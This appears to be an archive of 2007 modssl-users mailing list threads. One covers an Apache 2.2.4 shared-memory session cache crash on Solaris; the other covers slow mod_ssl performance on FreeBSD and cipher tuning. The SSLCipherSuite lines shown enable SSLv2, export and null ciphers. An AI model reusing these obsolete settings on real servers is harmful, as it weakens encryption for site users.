        b=qP/tJozc3nwTN2AGb2WdZyMoXzHtshiGazuBKfb8u/xu6ogiHjCJMrxahG9484/poSGC+OZoEgoXwK3hKQF+E9vV62y0zsHmFaR4U83XU5Tdl3aMCg3CEsUOnxOujksnyt230boHs74QkJg5tdD2rrpASPEcOX3XpEvxkL7SIWs=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=ChJa5iPBGRK4fypP/ViYGfTbrlj+OSmHj4ac2WusmBlPhgB9MRI/hp/H042NhhkwxxHzHT7yHhRpXQIvUOVEE8w7VlyGLbs9V5x9EBzWu+BHUGrnomAoVhL9Z3ayyuNE9mdqZSKyfIhXwp9feLMo45JbN2XKSIZh/6seRDez0V4=
Received: by 10.82.134.12 with SMTP id h12mr10394906bud.1174321328424;
        Mon, 19 Mar 2007 09:22:08 -0700 (PDT)
Received: by 10.82.165.16 with HTTP; Mon, 19 Mar 2007 09:22:08 -0700 (PDT)
Message-ID: <76f910780703190922x7e1c4d0ex3d226216bd853669@mail.gmail.com>
Date: Mon, 19 Mar 2007 12:22:08 -0400
From: "Yannick Mercier" 
To: modssl-users@modssl.org
Subject: Apache 2.2.4 childs dumping core when SSLSessionCache uses shm
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yannick Mercier" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hey list,
   when I set SSLSessionCache to shm:/opt/apache/logs/ssl_scache(512000) or
to shmcb:/opt/apache/logs/ssl_scache(512000) httpd childs dump core
with this output to the error_log when LogLevel is set to debug :

[Mon Mar 19 08:45:27 2007] [info] Initial (No.1) HTTPS request
received for child 2 (server www.example.com:443)
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(468): [client
10.1.2.3] inside shmcb_status
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(983): entering
shmcb_expire_division
[Mon Mar 19 08:45:27 2007] [debug] ssl_scache_shmcb.c(535): [client
10.16.250.8] leaving shmcb_status
[Mon Mar 19 08:45:27 2007] [info] [client 10.1.2.3] Connection closed
to child 2 with unclean shutdown (server www.example
.com:443)
[Mon Mar 19 08:45:28 2007] [notice] child pid 27827 exit signal Bus
error (10), possible coredump in /opt/apache

When running ipcs -sa to display shared memory usage as root, I get no output.
With my old apache 1.3 using mod_ssl and MM I have output when running ipcs -sa

To fix my problem, I have set SSLSessionCache to use dbm, that way I
get no errors but it is documented that dbm can suffer instability
under heavy load ...

Anyone can help fixing this ? any suggestions ? I built apache with
Sun Studio 11 under Solaris 8 with mod_authnz_ldap/openldap in 64bit
with these flags to the compiler -fast -xarch=v9b -xcode=pic32 , I
then compiled mod_perl and mod_evasive using apxs

Thank you
Yannick
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 25 13:54:30 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A718A14D887; Sun, 25 Mar 2007 13:54:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-07.ohiordc.rr.com (ms-smtp-07.ohiordc.rr.com [65.24.5.141])
	by master.modssl.org (Postfix) with ESMTP id 15C5814D833
	for ; Sun, 25 Mar 2007 13:54:29 +0200 (CEST)
Received: from TIMLP (c-75-64-251-39.hsd1.tn.comcast.net [75.64.251.39])
	by ms-smtp-07.ohiordc.rr.com (8.13.6/8.13.6) with ESMTP id l2PBrq9a015873
	for ; Sun, 25 Mar 2007 07:53:53 -0400 (EDT)
From: "Tim Lovelace" 
To: 
Subject: mod_ssl performance problems - FreeBSD
Date: Sun, 25 Mar 2007 06:53:47 -0500
Message-ID: <008a01c76ed4$3fe5dee0$6401a8c0@TIMLP>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_008B_01C76EAA.570FD6E0"
X-Mailer: Microsoft Office Outlook 11
Thread-Index: Acdu0/pWojGUyPIxSCaaHfu/GsyOGA==
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
X-Virus-Scanned: Symantec AntiVirus Scan Engine
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Lovelace" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_008B_01C76EAA.570FD6E0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hello,

 

I am having some issues with my SSL implementation on a FreeBSD 6.2-RELEASE
system. I am currently running the following software

 

Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1

 

All built from ports. In testing of the web application I noticed that once
SSL was added the initial login to the site was slowing down. I did some
testing using Apache Bench and have noticed that without SSL the server can
process about 700 requests per second. Using SSL the number is in the 13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed,
SSLSessionCache) and have seen 0 improvement. Using server_status shows that
there are plenty of resources available. Any help would be appreciated.

 

 

Tim


------=_NextPart_000_008B_01C76EAA.570FD6E0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















Hello,



 



I am having some issues with my SSL implementation on =
a
FreeBSD 6.2-RELEASE system. I am currently running the following =
software



 



Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with =
Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1



 



All built from ports. In testing of the web application I =
noticed that
once SSL was added the initial login to the site was slowing down. I did =
some
testing using Apache Bench and have noticed that without SSL the server =
can
process about 700 requests per second. Using SSL the number is in the =
13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed, =
SSLSessionCache)
and have seen 0 improvement. Using server_status shows that there are =
plenty of
resources available. Any help would be =
appreciated.



 



 



Tim









------=_NextPart_000_008B_01C76EAA.570FD6E0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Mar 25 18:15:17 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id A6E8414D887; Sun, 25 Mar 2007 18:15:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hemi.blown.net (hemi.blown.net [217.160.249.191])
	by master.modssl.org (Postfix) with ESMTP id 9152C14D839
	for ; Sun, 25 Mar 2007 18:15:15 +0200 (CEST)
Received: from boost.blown.net ([75.138.94.70])
	by hemi.blown.net (8.13.1/8.13.1) with ESMTP id l2PGEEw0003609;
	Sun, 25 Mar 2007 12:14:14 -0400
Received: from torque (torque.blown.net [192.168.1.37])
	by boost.blown.net (8.12.11.20060308/8.12.11) with ESMTP id l2PGEC7u015021;
	Sun, 25 Mar 2007 12:14:12 -0400
From: 
To: 
Cc: 
References: <008a01c76ed4$3fe5dee0$6401a8c0@TIMLP>
Subject: RE: mod_ssl performance problems - FreeBSD
Date: Sun, 25 Mar 2007 12:14:12 -0400
Message-ID: <071b01c76ef8$a0adadb0$3b0c0a0a@corp.blown.net>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_071C_01C76ED7.199C0DB0"
X-Mailer: Microsoft Office Outlook 11
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
thread-index: Acdu0/pWojGUyPIxSCaaHfu/GsyOGAAIR52g
In-Reply-To: <008a01c76ed4$3fe5dee0$6401a8c0@TIMLP>
X-Spam-Score: -4.195 () ALL_TRUSTED,AWL,BAYES_00,HTML_MESSAGE,NO_REAL_NAME
X-Scanned-By: MIMEDefang 2.43
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_071C_01C76ED7.199C0DB0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

What hardwre are you using for the client and the server?  are you running
ab from localhost?  What options are you using with ab?
 
Most of the CPU cycles in each transaction are going to be spent in the SSL
handshake.  I just did a quick test of one of my servers running 1.3.37 on a
dual Xeon 3.06, using a P4-3.2 as the client, and saw about 5000rps for
HTTP, and 24 for HTTPS.  I suspect that the latter may represent the
capabilities of my client machine rather than the server machine.
 
If you want fast SSL, you need hardware acceleration.  


  _____  

From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Tim Lovelace
Sent: Sunday, March 25, 2007 7:54 AM
To: modssl-users@modssl.org
Subject: mod_ssl performance problems - FreeBSD



Hello,

 

I am having some issues with my SSL implementation on a FreeBSD 6.2-RELEASE
system. I am currently running the following software

 

Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1

 

All built from ports. In testing of the web application I noticed that once
SSL was added the initial login to the site was slowing down. I did some
testing using Apache Bench and have noticed that without SSL the server can
process about 700 requests per second. Using SSL the number is in the 13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed,
SSLSessionCache) and have seen 0 improvement. Using server_status shows that
there are plenty of resources available. Any help would be appreciated.

 

 

Tim


------=_NextPart_000_071C_01C76ED7.199C0DB0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable









What hardwre are you using for the client and =
the=20
server?  are you running ab from localhost?  What options are =
you=20
using with ab?


 


Most of the CPU cycles in each transaction =
are going to=20
be spent in the SSL handshake.  I just did a quick =
test of one of=20
my servers running 1.3.37 on a dual Xeon 3.06, using a P4-3.2 as the =
client, and=20
saw about 5000rps for HTTP, and 24 for HTTPS.  I suspect =
that the=20
latter may represent the capabilities of my client machine rather than =
the=20
server machine.


 


If you want fast SSL, you need hardware=20
acceleration.  




  

  

  From: =
owner-modssl-users@modssl.org=20
  [mailto:owner-modssl-users@modssl.org] On Behalf Of Tim=20
  Lovelace
Sent: Sunday, March 25, 2007 7:54 AM
To:=20
  modssl-users@modssl.org
Subject: mod_ssl performance =
problems -=20
  FreeBSD


  

  

  
Hello,

  
 

  
I am having some issues =
with my=20
  SSL implementation on a FreeBSD 6.2-RELEASE system. I am currently =
running the=20
  following software

  
 

  
Server Version: Apache/1.3.37 (Unix) =
PHP/5.1.6 with=20
  Suhosin-Patch mod_ssl/2.8.28 =
OpenSSL/0.9.7e-p1

  
 

  
All built from ports. In testing of the web=20
  application I noticed that once SSL was added the initial login to the =
site=20
  was slowing down. I did some testing using Apache Bench and have =
noticed that=20
  without SSL the server can process about 700 requests per second. =
Using SSL=20
  the number is in the 13-15 range. I have tried changing a few =
parameters (log=20
  level, SSLRandomSeed, SSLSessionCache) and have seen 0 improvement. =
Using=20
  server_status shows that there are plenty of resources available. Any =
help=20
  would be appreciated.

  
 

  
 

  
Tim


------=_NextPart_000_071C_01C76ED7.199C0DB0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 26 03:55:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 86A1714D86B; Mon, 26 Mar 2007 03:55:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-03.ohiordc.rr.com (ms-smtp-03.ohiordc.rr.com [65.24.5.137])
	by master.modssl.org (Postfix) with ESMTP id 94D1214D841
	for ; Mon, 26 Mar 2007 03:55:03 +0200 (CEST)
Received: from TIMLP (c-75-64-251-39.hsd1.tn.comcast.net [75.64.251.39])
	by ms-smtp-03.ohiordc.rr.com (8.13.6/8.13.6) with ESMTP id l2Q1sQAW007455
	for ; Sun, 25 Mar 2007 21:54:27 -0400 (EDT)
From: "Tim Lovelace" 
To: 
Subject: RE: mod_ssl performance problems - FreeBSD
Date: Sun, 25 Mar 2007 20:54:20 -0500
Message-ID: <00b601c76f49$ac15bcf0$6401a8c0@TIMLP>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook 11
Thread-Index: Acdu0/pWojGUyPIxSCaaHfu/GsyOGAAIR52gABSD2kA=
In-Reply-To: <071b01c76ef8$a0adadb0$3b0c0a0a@corp.blown.net>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
X-Virus-Scanned: Symantec AntiVirus Scan Engine
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Lovelace" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the response. Although I expected a pretty decent difference
between HTTP and HTTPS I didn=92t realize it would be so significant. =
Both
machines are small P3 2ghz boxes, the client side is running Ubuntu. =
They
are connected to the same switch. For the ab options I am running

ab -n 1000 -c 100 =96s https://targethost

I can live with the low tps count assuming that the speed was a little
better. I have seen some of the initial connections take from 5-10 =
seconds
to setup. Is there some good general tuning I should try out?

Thanks
Tim=20

________________________________________
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of lusky@ircd-hybrid.org
Sent: Sunday, March 25, 2007 11:14 AM
To: modssl-users@modssl.org
Cc: timl@midsouth.rr.com
Subject: RE: mod_ssl performance problems - FreeBSD

What hardwre are you using for the client and the server?=A0 are you =
running
ab from localhost?=A0 What options are you using with ab?
=A0
Most of the CPU cycles in each transaction are going to be spent in =
the=A0SSL
handshake.=A0 I just did a quick test=A0of one of my servers running =
1.3.37 on a
dual Xeon 3.06, using a P4-3.2 as the client, and saw about 5000rps
for=A0HTTP, and 24=A0for HTTPS.=A0 I suspect that the latter may =
represent the
capabilities of my client machine rather than the server machine.
=A0
If you want fast SSL, you need hardware acceleration.=A0=20

________________________________________
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of Tim Lovelace
Sent: Sunday, March 25, 2007 7:54 AM
To: modssl-users@modssl.org
Subject: mod_ssl performance problems - FreeBSD
Hello,

I am having some issues with my SSL implementation on a FreeBSD =
6.2-RELEASE
system. I am currently running the following software

Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1

All built from ports. In testing of the web application I noticed that =
once
SSL was added the initial login to the site was slowing down. I did some
testing using Apache Bench and have noticed that without SSL the server =
can
process about 700 requests per second. Using SSL the number is in the =
13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed,
SSLSessionCache) and have seen 0 improvement. Using server_status shows =
that
there are plenty of resources available. Any help would be appreciated.


Tim

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 26 11:39:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3334B14D880; Mon, 26 Mar 2007 11:39:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web53709.mail.re2.yahoo.com (web53709.mail.re2.yahoo.com [206.190.37.30])
	by master.modssl.org (Postfix) with SMTP id 45C5E14D841
	for ; Mon, 26 Mar 2007 11:39:21 +0200 (CEST)
Received: (qmail 52678 invoked by uid 60001); 26 Mar 2007 09:38:46 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=WWGs2ftW5V8rJT8UYyTikHus013qYbq0jd8aug9duM0c98UwWaBcUnebMsFiHkYEz/VqiaRENFKC8+393gbvAtHdaEFSHpP1fv3syE4koW3NEi0e2rcX0ymGCPPeNJlFKQYuMoB7Ug1O49cjp9PP/EWziMI9nsoMJZQb8Y1h634=  ;
Message-ID: <20070326093846.52676.qmail@web53709.mail.re2.yahoo.com>
X-YMail-OSG: Xm0s.UoVM1mwV0HZTFzFXMMwNxPQ1g8FVPSGCfEusqYxlNAFmOlykPHCXROX1Rc9mV8yavtGESIU6FcjqjFjQWR1bnZ3A5Uyz_FizxRUW2LvhiPFXEy1nv.8wnNslVBIV021QQgBy4LQxewLcG821sbtGg--
Received: from [71.232.60.65] by web53709.mail.re2.yahoo.com via HTTP; Mon, 26 Mar 2007 02:38:45 PDT
Date: Mon, 26 Mar 2007 02:38:45 -0700 (PDT)
From: a k 
Subject: RE: mod_ssl performance problems - FreeBSD
To: modssl-users@modssl.org
In-Reply-To: <00b601c76f49$ac15bcf0$6401a8c0@TIMLP>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-2060053481-1174901925=:52396"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a k 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-2060053481-1174901925=:52396
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

The cipher you allow will have a big impact on performance.

Tim Lovelace  wrote: Thanks for the response. Although I expected a pretty decent difference
between HTTP and HTTPS I didn’t realize it would be so significant. Both
machines are small P3 2ghz boxes, the client side is running Ubuntu. They
are connected to the same switch. For the ab options I am running

ab -n 1000 -c 100 –s https://targethost

I can live with the low tps count assuming that the speed was a little
better. I have seen some of the initial connections take from 5-10 seconds
to setup. Is there some good general tuning I should try out?

Thanks
Tim 

________________________________________
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of lusky@ircd-hybrid.org
Sent: Sunday, March 25, 2007 11:14 AM
To: modssl-users@modssl.org
Cc: timl@midsouth.rr.com
Subject: RE: mod_ssl performance problems - FreeBSD

What hardwre are you using for the client and the server?  are you running
ab from localhost?  What options are you using with ab?
 
Most of the CPU cycles in each transaction are going to be spent in the SSL
handshake.  I just did a quick test of one of my servers running 1.3.37 on a
dual Xeon 3.06, using a P4-3.2 as the client, and saw about 5000rps
for HTTP, and 24 for HTTPS.  I suspect that the latter may represent the
capabilities of my client machine rather than the server machine.
 
If you want fast SSL, you need hardware acceleration.  

________________________________________
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Tim Lovelace
Sent: Sunday, March 25, 2007 7:54 AM
To: modssl-users@modssl.org
Subject: mod_ssl performance problems - FreeBSD
Hello,

I am having some issues with my SSL implementation on a FreeBSD 6.2-RELEASE
system. I am currently running the following software

Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1

All built from ports. In testing of the web application I noticed that once
SSL was added the initial login to the site was slowing down. I did some
testing using Apache Bench and have noticed that without SSL the server can
process about 700 requests per second. Using SSL the number is in the 13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed,
SSLSessionCache) and have seen 0 improvement. Using server_status shows that
there are plenty of resources available. Any help would be appreciated.


Tim

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


 
---------------------------------
TV dinner still cooling?
Check out "Tonight's Picks" on Yahoo! TV.
--0-2060053481-1174901925=:52396
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

The cipher you allow will have a big impact on performance.

Tim Lovelace <timl@midsouth.rr.com> wrote:
 Thanks for the response. Although I expected a pretty decent difference
between HTTP and HTTPS I didn’t realize it would be so significant. Both
machines are small P3 2ghz boxes, the client side is running Ubuntu. They
are connected to the same switch. For the ab options I am running

ab -n 1000 -c 100 –s https://targethost

I can live with the low tps count assuming that the speed was a little
better. I have seen some of the initial connections take from 5-10 seconds
to setup. Is there some good general tuning I should try out?

Thanks
Tim 

________________________________________
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of
 lusky@ircd-hybrid.org
Sent: Sunday, March 25, 2007 11:14 AM
To: modssl-users@modssl.org
Cc: timl@midsouth.rr.com
Subject: RE: mod_ssl performance problems - FreeBSD

What hardwre are you using for the client and the server?  are you running
ab from localhost?  What options are you using with ab?
 
Most of the CPU cycles in each transaction are going to be spent in the SSL
handshake.  I just did a quick test of one of my servers running 1.3.37 on a
dual Xeon 3.06, using a P4-3.2 as the client, and saw about 5000rps
for HTTP, and 24 for HTTPS.  I suspect that the latter may represent the
capabilities of my client machine rather than the server machine.
 
If you want fast SSL, you need hardware acceleration.  

________________________________________
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Tim Lovelace
Sent:
 Sunday, March 25, 2007 7:54 AM
To: modssl-users@modssl.org
Subject: mod_ssl performance problems - FreeBSD
Hello,

I am having some issues with my SSL implementation on a FreeBSD 6.2-RELEASE
system. I am currently running the following software

Server Version: Apache/1.3.37 (Unix) PHP/5.1.6 with Suhosin-Patch
mod_ssl/2.8.28 OpenSSL/0.9.7e-p1

All built from ports. In testing of the web application I noticed that once
SSL was added the initial login to the site was slowing down. I did some
testing using Apache Bench and have noticed that without SSL the server can
process about 700 requests per second. Using SSL the number is in the 13-15
range. I have tried changing a few parameters (log level, SSLRandomSeed,
SSLSessionCache) and have seen 0 improvement. Using server_status shows that
there are plenty of resources available. Any help would be
 appreciated.


Tim

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

 


TV dinner still cooling?
Check out "Tonight's Picks" on Yahoo! TV.
--0-2060053481-1174901925=:52396--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 26 15:52:45 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 84D9F14D899; Mon, 26 Mar 2007 15:52:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ms-smtp-05.ohiordc.rr.com (ms-smtp-05.ohiordc.rr.com [65.24.5.139])
	by master.modssl.org (Postfix) with ESMTP id 05E6114D841
	for ; Mon, 26 Mar 2007 15:52:44 +0200 (CEST)
Received: from TIMLP (c-75-64-251-39.hsd1.tn.comcast.net [75.64.251.39])
	by ms-smtp-05.ohiordc.rr.com (8.13.6/8.13.6) with ESMTP id l2QDq40I009893
	for ; Mon, 26 Mar 2007 09:52:07 -0400 (EDT)
From: "Tim Lovelace" 
To: 
Subject: RE: mod_ssl performance problems - FreeBSD
Date: Mon, 26 Mar 2007 08:51:55 -0500
Message-ID: <00c901c76fad$eea2f1f0$6401a8c0@TIMLP>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook 11
Thread-Index: AcdviqW6ggMmloTsQn63k1hkC3DAmwAIFkMw
In-Reply-To: <20070326093846.52676.qmail@web53709.mail.re2.yahoo.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028
X-Virus-Scanned: Symantec AntiVirus Scan Engine
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Tim Lovelace" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the information. What would be the recommended SSLCipherSuite
settings to use? I would like to eliminate some of the lower security
options, but I am curious what set of clients that would affect. =
Originally
ports had added this line to httpd.conf

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

I then changed it to=20

SSLCipherSuite =
!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

And saw some huge performance changes. The TPS jumped from the 13-15 =
range
into the lower 60 range. Also the total transaction time dropped by more
than 2/3 of the original.


So overall I have changed these parameters -

SSLCipherSuite - see above, huge changes
SSLRandomSeed - changed from /dev/random to /dev/urandom
SSLSessionCacheTimeout - increased to 900 due to the time users will be =
in
the app. What is the tradeoff memory-wise?

Are there any other parameters that should be tuned? I have seen a lot =
about
the SSLMutex but I am not sure I understand the value of making that =
change.
Thanks again

Tim


________________________________________
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of a k
Sent: Monday, March 26, 2007 4:39 AM
To: modssl-users@modssl.org
Subject: RE: mod_ssl performance problems - FreeBSD

The cipher you allow will have a big impact on performance.

Tim Lovelace  wrote:
Thanks for the response. Although I expected a pretty decent difference
between HTTP and HTTPS I didn=92t realize it would be so significant. =
Both
machines are small P3 2ghz boxes, the client side is running Ubuntu. =
They
are connected to the same switch. For the ab options I am running

ab -n 1000 -c 100 =96s https://targethost

I can live with the low tps count assuming that the speed was a little
better. I have seen some of the initial connections take from 5-10 =
seconds
to setup. Is there some good general tuning I should try out?

Thanks
Tim=20

________________________________________
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of lusky@ircd-hybrid.org
Sent: Sunday, March 25, 2007 11:14 AM
To: modssl-users@modssl.org
Cc: timl@midsouth.rr.com
Subject: RE: mod_ssl performance problems - FreeBSD

What hardwre are you using for the client and the server?=A0 are you =
running
ab from localhost?=A0 What options are you using with ab?
=A0
Most of the CPU cycles in each transaction are going to be spent in =
the=A0SSL
handshake.=A0 I just did a quick test=A0of one of my servers running =
